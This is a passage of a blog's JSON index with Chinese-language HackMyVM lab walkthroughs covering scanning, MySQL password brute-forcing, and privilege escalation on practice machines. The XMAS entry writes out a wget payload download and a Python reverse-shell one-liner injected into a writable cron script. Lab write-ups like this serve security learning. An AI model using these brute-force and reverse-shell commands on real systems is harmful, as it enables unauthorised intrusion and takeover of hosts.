style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-shell\" data-lang=\"shell\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u0026gt; whatweb adria.hmv\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ehttp://adria.hmv \u003cspan style=\"color:#f92672\"\u003e[\u003c/span\u003e\u003cspan style=\"color:#ae81ff\"\u003e200\u003c/span\u003e OK\u003cspan style=\"color:#f92672\"\u003e]\u003c/span\u003e Apache\u003cspan style=\"color:#f92672\"\u003e[\u003c/span\u003e2.4.57\u003cspan style=\"color:#f92672\"\u003e]\u003c/span\u003e, Bootstrap, Cookies\u003cspan style=\"color:#f92672\"\u003e[\u003c/span\u003eINTELLI_7da515443a\u003cspan style=\"color:#f92672\"\u003e]\u003c/span\u003e, Country\u003cspan style=\"color:#f92672\"\u003e[\u003c/span\u003eRESERVED\u003cspan style=\"color:#f92672\"\u003e][\u003c/span\u003eZZ\u003cspan style=\"color:#f92672\"\u003e]\u003c/span\u003e, HTML5, HTTPServer\u003cspan style=\"color:#f92672\"\u003e[\u003c/span\u003eDebian Linux\u003cspan style=\"color:#f92672\"\u003e][\u003c/span\u003eApache/2.4.57 \u003cspan style=\"color:#f92672\"\u003e(\u003c/span\u003eDebian\u003cspan style=\"color:#f92672\"\u003e)]\u003c/span\u003e, IP\u003cspan style=\"color:#f92672\"\u003e[\u003c/span\u003e192.168.244.102\u003cspan style=\"color:#f92672\"\u003e]\u003c/span\u003e, JQuery, MetaGenerator\u003cspan style=\"color:#f92672\"\u003e[\u003c/span\u003eSubrion CMS - Open Source Content Management System\u003cspan style=\"color:#f92672\"\u003e]\u003c/span\u003e, Open-Graph-Protocol, PoweredBy\u003cspan style=\"color:#f92672\"\u003e[\u003c/span\u003eSubrion\u003cspan style=\"color:#f92672\"\u003e]\u003c/span\u003e, Script, Title\u003cspan style=\"color:#f92672\"\u003e[\u003c/span\u003eBlog :: Powered by Subrion 4.2\u003cspan style=\"color:#f92672\"\u003e]\u003c/span\u003e, UncommonHeaders\u003cspan style=\"color:#f92672\"\u003e[\u003c/span\u003ex-powered-cms\u003cspan style=\"color:#f92672\"\u003e]\u003c/span\u003e, X-UA-Compatible\u003cspan style=\"color:#f92672\"\u003e[\u003c/span\u003eIE\u003cspan style=\"color:#f92672\"\u003e=\u003c/span\u003eEdge\u003cspan style=\"color:#f92672\"\u003e]\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch2 id=\"smb_139445\"\u003esmb_139+445\u003c/h2\u003e\n\u003cp\u003e枚举一下smb\u003c/p\u003e","tags":["sec"],"title":"HMV_adria"},{"date":"2024-04-16","permalink":"https://l1uyun.one/posts/hmv_area51/","summary":"\u003ch2 id=\"主机发现\"\u003e主机发现\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e~/workspace sudo arp-scan -I ens33 -l\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eInterface: ens33, type: EN10MB, MAC: 00:0c:29:a1:f0:49, IPv4: 192.168.89.15\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eStarting arp-scan 1.10.0 with \u003cspan style=\"color:#ae81ff\"\u003e256\u003c/span\u003e hosts \u003cspan style=\"color:#f92672\"\u003e(\u003c/span\u003ehttps://github.com/royhills/arp-scan\u003cspan style=\"color:#f92672\"\u003e)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e192.168.89.13   08:00:27:96:66:e2       PCS Systemtechnik GmbH\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e192.168.89.99   f6:39:4a:3d:95:18       \u003cspan style=\"color:#f92672\"\u003e(\u003c/span\u003eUnknown: locally administered\u003cspan style=\"color:#f92672\"\u003e)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e192.168.89.247  ca:a7:78:4d:50:e1       \u003cspan style=\"color:#f92672\"\u003e(\u003c/span\u003eUnknown: locally administered\u003cspan style=\"color:#f92672\"\u003e)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch2 id=\"端口扫描\"\u003e端口扫描\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e~/workspace sudo nmap 192.168.89.13 -Pn -sT -p- -A --min-rate\u003cspan style=\"color:#f92672\"\u003e=\u003c/span\u003e\u003cspan style=\"color:#ae81ff\"\u003e10000\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eStarting Nmap 7.94SVN \u003cspan style=\"color:#f92672\"\u003e(\u003c/span\u003e https://nmap.org \u003cspan style=\"color:#f92672\"\u003e)\u003c/span\u003e at 2024-04-16 07:34 EDT\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eNmap scan report \u003cspan style=\"color:#66d9ef\"\u003efor\u003c/span\u003e 192.168.89.13\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eHost is up \u003cspan style=\"color:#f92672\"\u003e(\u003c/span\u003e0.0025s latency\u003cspan style=\"color:#f92672\"\u003e)\u003c/span\u003e.\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eNot shown: \u003cspan style=\"color:#ae81ff\"\u003e65532\u003c/span\u003e closed tcp ports \u003cspan style=\"color:#f92672\"\u003e(\u003c/span\u003econn-refused\u003cspan style=\"color:#f92672\"\u003e)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ePORT     STATE SERVICE     VERSION\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e22/tcp   open  ssh         OpenSSH 8.4p1 Debian \u003cspan style=\"color:#ae81ff\"\u003e5\u003c/span\u003e \u003cspan style=\"color:#f92672\"\u003e(\u003c/span\u003eprotocol 2.0\u003cspan style=\"color:#f92672\"\u003e)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e| ssh-hostkey:\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e|   \u003cspan style=\"color:#ae81ff\"\u003e3072\u003c/span\u003e de:bf:2a:93:86:b8:b3:a3:13:5b:46:66:34:d6:dc:b1 \u003cspan style=\"color:#f92672\"\u003e(\u003c/span\u003eRSA\u003cspan style=\"color:#f92672\"\u003e)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e|   \u003cspan style=\"color:#ae81ff\"\u003e256\u003c/span\u003e a9:df:bb:71:90:6c:d1:2f:e7:48:97:2e:ad:7b:15:d3 \u003cspan style=\"color:#f92672\"\u003e(\u003c/span\u003eECDSA\u003cspan style=\"color:#f92672\"\u003e)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e|_  \u003cspan style=\"color:#ae81ff\"\u003e256\u003c/span\u003e 78:75:83:1c:03:03:a1:92:4f:73:8e:f2:2d:23:d2:0e \u003cspan style=\"color:#f92672\"\u003e(\u003c/span\u003eED25519\u003cspan style=\"color:#f92672\"\u003e)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e80/tcp   open  http        Apache httpd 2.4.51 \u003cspan style=\"color:#f92672\"\u003e((\u003c/span\u003eDebian\u003cspan style=\"color:#f92672\"\u003e))\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e|_http-server-header: Apache/2.4.51 \u003cspan style=\"color:#f92672\"\u003e(\u003c/span\u003eDebian\u003cspan style=\"color:#f92672\"\u003e)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e|_http-title: FBI Access\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e8080/tcp open  nagios-nsca Nagios NSCA\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e|_http-title: Site doesn\u003cspan style=\"color:#960050;background-color:#1e0010\"\u003e\u0026#39;\u003c/span\u003et have a title \u003cspan style=\"color:#f92672\"\u003e(\u003c/span\u003eapplication/json\u003cspan style=\"color:#f92672\"\u003e)\u003c/span\u003e.\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eMAC Address: 08:00:27:96:66:E2 \u003cspan style=\"color:#f92672\"\u003e(\u003c/span\u003eOracle VirtualBox virtual NIC\u003cspan style=\"color:#f92672\"\u003e)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eDevice type: general purpose\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eRunning: Linux 4.X|5.X\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eOS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eOS details: Linux 4.15 - 5.8\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eNetwork Distance: \u003cspan style=\"color:#ae81ff\"\u003e1\u003c/span\u003e hop\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eTRACEROUTE\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eHOP RTT     ADDRESS\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#ae81ff\"\u003e1\u003c/span\u003e   2.52 ms 192.168.89.13\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eOS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eNmap \u003cspan style=\"color:#66d9ef\"\u003edone\u003c/span\u003e: \u003cspan style=\"color:#ae81ff\"\u003e1\u003c/span\u003e IP address \u003cspan style=\"color:#f92672\"\u003e(\u003c/span\u003e\u003cspan style=\"color:#ae81ff\"\u003e1\u003c/span\u003e host up\u003cspan style=\"color:#f92672\"\u003e)\u003c/span\u003e scanned in 11.70 seconds\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch2 id=\"web_80\"\u003eweb_80\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e~/workspace whatweb 192.168.89.13\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ehttp://192.168.89.13 \u003cspan style=\"color:#f92672\"\u003e[\u003c/span\u003e\u003cspan style=\"color:#ae81ff\"\u003e200\u003c/span\u003e OK\u003cspan style=\"color:#f92672\"\u003e]\u003c/span\u003e Apache\u003cspan style=\"color:#f92672\"\u003e[\u003c/span\u003e2.4.51\u003cspan style=\"color:#f92672\"\u003e]\u003c/span\u003e, Bootstrap, Country\u003cspan style=\"color:#f92672\"\u003e[\u003c/span\u003eRESERVED\u003cspan style=\"color:#f92672\"\u003e][\u003c/span\u003eZZ\u003cspan style=\"color:#f92672\"\u003e]\u003c/span\u003e, HTML5, HTTPServer\u003cspan style=\"color:#f92672\"\u003e[\u003c/span\u003eDebian Linux\u003cspan style=\"color:#f92672\"\u003e][\u003c/span\u003eApache/2.4.51 \u003cspan style=\"color:#f92672\"\u003e(\u003c/span\u003eDebian\u003cspan style=\"color:#f92672\"\u003e)]\u003c/span\u003e, IP\u003cspan style=\"color:#f92672\"\u003e[\u003c/span\u003e192.168.89.13\u003cspan style=\"color:#f92672\"\u003e]\u003c/span\u003e, JQuery\u003cspan style=\"color:#f92672\"\u003e[\u003c/span\u003e2.1.3\u003cspan style=\"color:#f92672\"\u003e]\u003c/span\u003e, PasswordField, Script, Title\u003cspan style=\"color:#f92672\"\u003e[\u003c/span\u003eFBI Access\u003cspan style=\"color:#f92672\"\u003e]\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e~/workspace whatweb 192.168.89.13:8080\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ehttp://192.168.89.13:8080 \u003cspan style=\"color:#f92672\"\u003e[\u003c/span\u003e\u003cspan style=\"color:#ae81ff\"\u003e400\u003c/span\u003e Bad Request\u003cspan style=\"color:#f92672\"\u003e]\u003c/span\u003e Country\u003cspan style=\"color:#f92672\"\u003e[\u003c/span\u003eRESERVED\u003cspan style=\"color:#f92672\"\u003e][\u003c/span\u003eZZ\u003cspan style=\"color:#f92672\"\u003e]\u003c/span\u003e, IP\u003cspan style=\"color:#f92672\"\u003e[\u003c/span\u003e192.168.89.13\u003cspan style=\"color:#f92672\"\u003e]\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003e\n\u003cfigure class=\"md-figure\"\u003e\n  \u003cimg loading=\"lazy\" decoding=\"async\" src=\"https://img.l1uyun.one/HMV_area51_image_1.png\" alt=\"HMV_area51_image_1\" /\u003e\u003cfigcaption\u003eHMV_area51_image_1\u003c/figcaption\u003e\u003c/figure\u003e\n\n\n\u003c/p\u003e","tags":["sec"],"title":"area51"},{"date":"2024-02-15","permalink":"https://l1uyun.one/posts/hmv_slowman/","summary":"\u003ch2 id=\"端口扫描\"\u003e端口扫描\u003c/h2\u003e\n\u003cp\u003e网络环境问题,还是得 nmap 的全端口扫描\u003c/p\u003e\n\u003cp\u003e\n\u003cfigure class=\"md-figure\"\u003e\n  \u003cimg loading=\"lazy\" decoding=\"async\" src=\"https://img.l1uyun.one/HMM_slowman_image_1.png\" alt=\"HMM_slowman_image_1\" /\u003e\u003cfigcaption\u003eHMM_slowman_image_1\u003c/figcaption\u003e\u003c/figure\u003e\n\n\n\u003c/p\u003e\n\u003ch2 id=\"ftp-匿名登录\"\u003eftp 匿名登录\u003c/h2\u003e\n\u003cp\u003e\n\u003cfigure class=\"md-figure\"\u003e\n  \u003cimg loading=\"lazy\" decoding=\"async\" src=\"https://img.l1uyun.one/HMM_slowman_image_2.png\" alt=\"HMM_slowman_image_2\" /\u003e\u003cfigcaption\u003eHMM_slowman_image_2\u003c/figcaption\u003e\u003c/figure\u003e\n\n\n\u003c/p\u003e\n\u003ch2 id=\"爆破-mysql-密码\"\u003e爆破 mysql 密码\u003c/h2\u003e\n\u003cp\u003etrainerjeff\n接下来得看 mysql 了\nhydra 好慢\n换了 ncrack 试试\u003c/p\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003esudo ncrack -T5 -v -u trainerjeff -P /usr/share/wordlists/rockyou.txt mysql://192.168.10.8\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003esudo  medusa -h 192.168.10.8 -u trainerjeff -P /usr/share/wordlists/rockyou.txt -M mysql\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003esudo hydra -l trainerjeff -P /usr/share/wordlists/rockyou.txt 192.168.10.8 mysql\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003e没出来, 吐了, 每分钟八次. 太慢了. 看 wp 算了\n假装枚举出来了\n\n\u003cfigure class=\"md-figure\"\u003e\n  \u003cimg loading=\"lazy\" decoding=\"async\" src=\"https://img.l1uyun.one/HMM_slowman_image_3.png\" alt=\"HMM_slowman_image_3\" /\u003e\u003cfigcaption\u003eHMM_slowman_image_3\u003c/figcaption\u003e\u003c/figure\u003e\n\n\n\u003c/p\u003e\n\u003ch2 id=\"枚举-mysql-信息\"\u003e枚举 mysql 信息\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003esudo mysql -h 192.168.10.8 -u trainerjeff -psoccer1\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003e\n\u003cfigure class=\"md-figure\"\u003e\n  \u003cimg loading=\"lazy\" decoding=\"async\" src=\"https://img.l1uyun.one/HMM_slowman_image_4.png\" alt=\"HMM_slowman_image_4\" /\u003e\u003cfigcaption\u003eHMM_slowman_image_4\u003c/figcaption\u003e\u003c/figure\u003e\n\n\n\u003c/p\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e|  \u003cspan style=\"color:#ae81ff\"\u003e1\u003c/span\u003e | gonzalo     tH1sS2stH3g0nz4l0pAsSWW0rDD!! \n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e|  \u003cspan style=\"color:#ae81ff\"\u003e2\u003c/span\u003e | $SECRETLOGINURL /secretLOGIN/login.html  \n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003e\n\u003cfigure class=\"md-figure\"\u003e\n  \u003cimg loading=\"lazy\" decoding=\"async\" src=\"https://img.l1uyun.one/HMM_slowman_image_5.png\" alt=\"HMM_slowman_image_5\" /\u003e\u003cfigcaption\u003eHMM_slowman_image_5\u003c/figcaption\u003e\u003c/figure\u003e\n\n\n\u003c/p\u003e\n\u003ch2 id=\"web-枚举\"\u003eweb 枚举\u003c/h2\u003e\n\u003cp\u003e\n\u003cfigure class=\"md-figure\"\u003e\n  \u003cimg loading=\"lazy\" decoding=\"async\" src=\"https://img.l1uyun.one/HMM_slowman_image_6.png\" alt=\"HMM_slowman_image_6\" /\u003e\u003cfigcaption\u003eHMM_slowman_image_6\u003c/figcaption\u003e\u003c/figure\u003e\n\n\n\n进入之前 mysql 中发现的隐藏目录, 使用发现的用户名密码登录, 后面发现这个也能登录 ssh\n\n\u003cfigure class=\"md-figure\"\u003e\n  \u003cimg loading=\"lazy\" decoding=\"async\" src=\"https://img.l1uyun.one/HMM_slowman_image_7.png\" alt=\"HMM_slowman_image_7\" /\u003e\u003cfigcaption\u003eHMM_slowman_image_7\u003c/figcaption\u003e\u003c/figure\u003e\n\n\n\n进去之后有个压缩包, 有密码\n使用 john\n\n\u003cfigure class=\"md-figure\"\u003e\n  \u003cimg loading=\"lazy\" decoding=\"async\" src=\"https://img.l1uyun.one/HMM_slowman_image_8.png\" alt=\"HMM_slowman_image_8\" /\u003e\u003cfigcaption\u003eHMM_slowman_image_8\u003c/figcaption\u003e\u003c/figure\u003e\n\n\n\n解压之后是一个账号和密码, 猜测是 ssh 的\u003c/p\u003e","tags":["sec"],"title":"slowman"},{"date":"2024-02-14","permalink":"https://l1uyun.one/posts/hmm_xmas/","summary":"\u003ch2 id=\"靶机-启动\"\u003e靶机, 启动\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e192.168.10.16\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch2 id=\"端口扫描\"\u003e端口扫描\u003c/h2\u003e\n\u003cp\u003e\n\u003cfigure class=\"md-figure\"\u003e\n  \u003cimg loading=\"lazy\" decoding=\"async\" src=\"https://img.l1uyun.one/HMM_XMAS_image_1.png\" alt=\"HMM_XMAS_image_1\" /\u003e\u003cfigcaption\u003eHMM_XMAS_image_1\u003c/figcaption\u003e\u003c/figure\u003e\n\n\n\u003c/p\u003e\n\u003cp\u003e\n\u003cfigure class=\"md-figure\"\u003e\n  \u003cimg loading=\"lazy\" decoding=\"async\" src=\"https://img.l1uyun.one/HMM_XMAS_image_2.png\" alt=\"HMM_XMAS_image_2\" /\u003e\u003cfigcaption\u003eHMM_XMAS_image_2\u003c/figcaption\u003e\u003c/figure\u003e\n\n\n\u003c/p\u003e\n\u003ch2 id=\"web-服务\"\u003eweb 服务\u003c/h2\u003e\n\u003cp\u003e目录扫描\u003c/p\u003e\n\u003cp\u003e\n\u003cfigure class=\"md-figure\"\u003e\n  \u003cimg loading=\"lazy\" decoding=\"async\" src=\"https://img.l1uyun.one/HMM_XMAS_image_3.png\" alt=\"HMM_XMAS_image_3\" /\u003e\u003cfigcaption\u003eHMM_XMAS_image_3\u003c/figcaption\u003e\u003c/figure\u003e\n\n\n\u003c/p\u003e\n\u003cp\u003e在主页的下面发现了一个上传点, 直接上传反弹 shell\u003c/p\u003e\n\u003cp\u003e\n\u003cfigure class=\"md-figure\"\u003e\n  \u003cimg loading=\"lazy\" decoding=\"async\" src=\"https://img.l1uyun.one/HMM_XMAS_image_4.png\" alt=\"HMM_XMAS_image_4\" /\u003e\u003cfigcaption\u003eHMM_XMAS_image_4\u003c/figcaption\u003e\u003c/figure\u003e\n\n\n\u003c/p\u003e\n\u003cp\u003e使用 nc 失败, 换成了 webshell\u003c/p\u003e\n\u003cp\u003e\n\u003cfigure class=\"md-figure\"\u003e\n  \u003cimg loading=\"lazy\" decoding=\"async\" src=\"https://img.l1uyun.one/HMM_XMAS_image_5.png\" alt=\"HMM_XMAS_image_5\" /\u003e\u003cfigcaption\u003eHMM_XMAS_image_5\u003c/figcaption\u003e\u003c/figure\u003e\n\n\n\u003c/p\u003e\n\u003cp\u003e\n\u003cfigure class=\"md-figure\"\u003e\n  \u003cimg loading=\"lazy\" decoding=\"async\" src=\"https://img.l1uyun.one/HMM_XMAS_image_6.png\" alt=\"HMM_XMAS_image_6\" /\u003e\u003cfigcaption\u003eHMM_XMAS_image_6\u003c/figcaption\u003e\u003c/figure\u003e\n\n\n\n然后还是用了 meterpreter\u003c/p\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ewget http://192.168.10.11:8000/shell.elf -O /tmp/shell.elf\u003cspan style=\"color:#f92672\"\u003e\u0026amp;\u0026amp;\u003c/span\u003echmod \u003cspan style=\"color:#ae81ff\"\u003e777\u003c/span\u003e /tmp/shell.elf\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch2 id=\"www-data-进一步收集信息\"\u003ewww-data ,进一步收集信息\u003c/h2\u003e\n\u003cp\u003e/home/alabaster/nice_list. txt\u003c/p\u003e\n\u003cp\u003e\n\u003cfigure class=\"md-figure\"\u003e\n  \u003cimg loading=\"lazy\" decoding=\"async\" src=\"https://img.l1uyun.one/HMM_XMAS_image_7.png\" alt=\"HMM_XMAS_image_7\" /\u003e\u003cfigcaption\u003eHMM_XMAS_image_7\u003c/figcaption\u003e\u003c/figure\u003e\n\n\n\u003c/p\u003e\n\u003cp\u003e这有个 python 代码,. 在 linpeas. sh 枚举之后发现是定时任务, 并且是可写的\u003c/p\u003e\n\u003cp\u003e\n\u003cfigure class=\"md-figure\"\u003e\n  \u003cimg loading=\"lazy\" decoding=\"async\" src=\"https://img.l1uyun.one/HMM_XMAS_image_8.png\" alt=\"HMM_XMAS_image_8\" /\u003e\u003cfigcaption\u003eHMM_XMAS_image_8\u003c/figcaption\u003e\u003c/figure\u003e\n\n\n\u003c/p\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eecho \u003cspan style=\"color:#e6db74\"\u003e\u0026#39;import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\u0026#34;192.168.10.11\u0026#34;,7777));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\u0026#34;bash\u0026#34;)\u0026#39;\u003c/span\u003e \u0026gt; nice_or_naughty.py\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eecho \u003cspan style=\"color:#e6db74\"\u003e\u0026#39;import subprocess; subprocess.call([\u0026#34;/tmp/newshell.elf\u0026#34;])\u0026#39;\u003c/span\u003e \u0026gt; nice_or_naughty.py\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003e又是这样子不稳定的 shell\u003c/p\u003e\n\u003cp\u003e\n\u003cfigure class=\"md-figure\"\u003e\n  \u003cimg loading=\"lazy\" decoding=\"async\" src=\"https://img.l1uyun.one/HMM_XMAS_image_9.png\" alt=\"HMM_XMAS_image_9\" /\u003e\u003cfigcaption\u003eHMM_XMAS_image_9\u003c/figcaption\u003e\u003c/figure\u003e\n\n\n\u003c/p\u003e\n\u003cp\u003e上传一个 socat 二进制文件上去算了\u003c/p\u003e","tags":["sec"],"title":"XMAS"},{"date":"2024-02-13","permalink":"https://l1uyun.one/posts/hmm_vivifytech/","summary":"\u003cp\u003e192.168.10.12\u003c/p\u003e\n\u003ch2 id=\"端口扫描\"\u003e端口扫描\u003c/h2\u003e\n\u003cp\u003e\n\u003cfigure class=\"md-figure\"\u003e\n  \u003cimg loading=\"lazy\" decoding=\"async\" src=\"https://img.l1uyun.one/HMM_vivifytech_image_1.png\" alt=\"HMM_vivifytech_image_1\" /\u003e\u003cfigcaption\u003eHMM_vivifytech_image_1\u003c/figcaption\u003e\u003c/figure\u003e\n\n\n\u003c/p\u003e\n\u003ch2 id=\"web目录扫描\"\u003eweb目录扫描\u003c/h2\u003e\n\u003cp\u003e进一步扫描 WordPress 下的目录\u003c/p\u003e\n\u003cp\u003e\n\u003cfigure class=\"md-figure\"\u003e\n  \u003cimg loading=\"lazy\" decoding=\"async\" src=\"https://img.l1uyun.one/HMM_vivifytech_image_2.png\" alt=\"HMM_vivifytech_image_2\" /\u003e\u003cfigcaption\u003eHMM_vivifytech_image_2\u003c/figcaption\u003e\u003c/figure\u003e\n\n\n\u003c/p\u003e\n\u003cp\u003e发现敏感文件 secret. 